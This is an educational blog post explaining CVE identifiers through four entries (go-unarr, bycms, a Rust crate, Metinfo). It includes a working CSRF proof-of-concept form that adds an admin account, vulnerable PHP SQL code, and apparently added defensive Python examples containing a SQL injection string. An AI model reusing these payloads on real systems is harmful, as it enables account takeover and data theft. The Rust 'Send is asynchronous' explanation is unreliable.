Grzegorz Piechnik

What are and how to read CVEs (Common Vulnerabilities and Exposures)?

CVE, or Common Vulnerabilities and Exposures, is a public dictionary of registered vulnerabilities and threats in systems. According to the vision of its maintainers, the dictionary is intended to serve as an industry standard for communication between different teams. Although the creators themselves avoid the term, it is a database of sorts. According to their documentation, a vulnerability is defined as a weakness in a given system (resulting from bugs), while a threat is defined as a violation of security policy. A dictionary of CVEs can be found here.

What a CVE consists of

Each CVE has its own ID, which is constructed as follows:

CVE - Year of submission - Serial number = CVE-2021-38197

An example submission (depending on the information provided) may look like the image below.

[Image: example CVE entry]

As we can see, it includes the ID we mentioned, a brief description, a reference, the vulnerable version, the attack vector, its complexity and much more.

CVE examples

We will take a look at the last few vulnerabilities registered in the dictionary.

CVE-2021-38197

After opening the CVE, we learn that the entry concerns go-unarr, a library used to unpack RAR, TAR, ZIP and 7z archives. As a reference, a link to GitHub is provided, from which we can learn that version 0.1.1 of the library allows a Path Traversal attack, which in the example results in placing a file from the archive anywhere on the server.
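The check that stops this class of bug, as an added example in Python (not go-unarr's code and not from the original post): every entry name is resolved against the destination directory and rejected if it lands outside it. The function names and the sample archive are constructed for illustration.

```python
import io
import os
import zipfile


def resolve_entry(dest_dir, entry_name):
    """Return the absolute target path for an archive entry, or raise
    ValueError if the entry would land outside dest_dir."""
    dest_root = os.path.realpath(dest_dir)
    # Entry names may use either separator; normalise before joining.
    candidate = os.path.realpath(
        os.path.join(dest_root, entry_name.replace("\\", "/")))
    if os.path.commonpath([dest_root, candidate]) != dest_root:
        raise ValueError(f"entry escapes destination: {entry_name!r}")
    return candidate


def extract_checked(archive_bytes, dest_dir):
    """Extract only entries that stay inside dest_dir.
    Returns (written, rejected) lists of entry names."""
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            try:
                target = resolve_entry(dest_dir, info.filename)
            except ValueError:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written, rejected


def build_sample_archive():
    """Constructed sample: one ordinary entry and two traversal entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "hello")
        zf.writestr("../outside.txt", "constructed traversal entry")
        zf.writestr("docs/../../outside2.txt", "constructed traversal entry")
    return buf.getvalue()
```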

CVE-2020-18457

As another example, we will use the entry for the bycms content management system. In version 1.3.0, a properly crafted file with a form (below) allows us to launch a CSRF attack. If you don't yet know what it consists of, we refer you to here.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/admin.php/ucenter/add.html" method="POST">
      <input type="hidden" name="username" value="root" />
      <input type="hidden" name="password" value="11a040841c73c8627c274ba30f8b2123" />
      <input type="hidden" name="mobile" value="1233435346456" />
      <input type="hidden" name="email" value="qweqwe&#64;qq&#46;com" />
      <input type="hidden" name="cover&#95;id" value="" />
      <input type="hidden" name="file&#95;path" value="" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="id" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
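The server-side check whose absence makes a form like this work, as an added example in Python (not bycms code and not from the original post): a state-changing POST is accepted only from the application's own origin and only with a token bound to the session. The function names, the `csrf_token` field and the key handling are assumptions for illustration.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret (assumption)
ALLOWED_ORIGIN = "http://localhost"    # origin of the PoC's form action


def issue_csrf_token(session_id):
    """Token bound to one session; the server embeds it in forms it renders."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def is_state_change_allowed(session_id, origin, form):
    """Allow a state-changing POST only from our own origin and only with
    the token issued for this session."""
    if origin != ALLOWED_ORIGIN:
        return False
    supplied = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(supplied.encode(), expected.encode())


# Constructed sample: fields a cross-site form like the PoC would send.
# The browser attaches the admin's session cookie, but the page hosting
# the form cannot read the token, so the field is absent.
FORGED_FORM = {"username": "root", "status": "1"}
```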

CVE-2020-36458

Using this example, we can see the essence of the CVE dictionary. Not all reports involve direct attacks on users of the application.

In the CVE we read that the parameters (T, E) for the ReaderResult class were asynchronous. As a result, it allowed for potential memory corruption if multiple threads used these parameters. To understand how this occurs, we need to have a basic understanding of the Rust language.

In the documentation we read that generic parameters use traits to specify the functionality they implement. Below is an example of a function accepting a generic type "T" that implements the Display trait.

use std::fmt::Display;

// Define a function `printer` that takes a generic type `T` which
// must implement trait `Display`.
fn printer<T: Display>(t: T) {
    println!("{}", t);
}

In the aforementioned report, the trait bound on the T and E parameters was Send, which, as we mentioned, was asynchronous.

CVE-2020-20981

The subject of the report is the Metinfo CMS. In its version 7.0.0, it was possible to perform a blind SQL injection attack with the help of jdn endpoints. Vulnerable code:

public function dodel(){
global $_M;
$id = isset($_M['form']['id']) ? $_M['form']['id'] : '';
if (!$id){
  $this->error($_M['word']['js10']);
}
$id = implode(',',$id);
$del_resutl = DB::query("DELETE FROM {$_M['table']['admin_logs']} WHERE id IN ({$id}) ");
if (!$del_resutl){
  $this->error($_M['word']['opfailed']);
}

In the following line, the value is only filtered by addslashes, which ultimately changes nothing: the value is later interpolated into an unquoted IN (...) list, so a malicious payload needs no quote characters and can still be injected further down the line.

$id = isset($_M['form']['id']) ? $_M['form']['id'] : '';

Ultimately, the vulnerability results in access to sensitive data.
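The same query pattern next to a hardened form, as an added example in Python with an in-memory SQLite table (not Metinfo code and not from the original post). The table contents, function names and the sample input are constructed; the safe variant accepts only decimal integers and binds them as parameters.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the admin_logs table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_logs (id INTEGER PRIMARY KEY, msg TEXT)")
    conn.executemany("INSERT INTO admin_logs VALUES (?, ?)",
                     [(1, "login"), (2, "edit"), (3, "logout")])
    return conn


def delete_logs_unsafe(conn, ids):
    """Same pattern as dodel(): request values joined into the SQL text."""
    conn.execute(f"DELETE FROM admin_logs WHERE id IN ({','.join(ids)})")


def delete_logs_safe(conn, ids):
    """Accept only decimal integers, then bind them as parameters."""
    clean = []
    for raw in ids:
        text = str(raw).strip()
        if not (text.isascii() and text.isdigit()):
            raise ValueError(f"non-numeric id rejected: {raw!r}")
        clean.append(int(text))
    if clean:
        marks = ",".join("?" * len(clean))
        conn.execute(f"DELETE FROM admin_logs WHERE id IN ({marks})", clean)


def remaining(conn):
    """Number of rows still present in admin_logs."""
    return conn.execute("SELECT COUNT(*) FROM admin_logs").fetchone()[0]


# Constructed input with no quote characters, so addslashes-style escaping
# leaves it unchanged; it closes the IN list and widens the WHERE clause.
HOSTILE_IDS = ["1) OR (1=1"]
```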

Sources

https://cve.mitre.org/
https://www.whitesourcesoftware.com/resources/blog/cve-vulnerability/
https://cve.circl.lu/cve/CVE-2021-38197
https://cve.circl.lu/cve/CVE-2020-18457
https://cve.circl.lu/cve/CVE-2020-36458
https://doc.rust-lang.org/rust-by-example/generics/bounds.html#bounds
https://cve.circl.lu/cve/CVE-2020-20981
